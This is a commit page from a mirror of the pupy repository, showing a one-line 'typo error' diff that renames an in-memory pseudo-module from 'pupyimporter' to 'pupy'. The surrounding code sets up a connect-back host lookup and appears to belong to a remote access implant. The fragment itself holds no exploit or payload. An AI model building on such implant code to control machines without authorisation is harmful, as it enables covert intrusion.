mirror of https://github.com/n1nj4sec/pupy.git
typo error
This commit is contained in:
parent
db4f95af66
commit
d46291147a
|
@ -71,9 +71,9 @@ def get_next_wait(attempt):
|
|||
|
||||
def add_pseudo_pupy_module(HOST):
|
||||
if not "pupy" in sys.modules:
|
||||
mod = imp.new_module("pupyimporter")
|
||||
mod = imp.new_module("pupy")
|
||||
mod.__name__="pupy"
|
||||
mod.__file__="<memimport>\\\\pupyimporter"
|
||||
mod.__file__="<memimport>\\\\pupy"
|
||||
mod.__package__="pupy"
|
||||
sys.modules["pupy"]=mod
|
||||
mod.get_connect_back_host=(lambda : HOST)
|
||||
|
|
Loading…
Reference in New Issue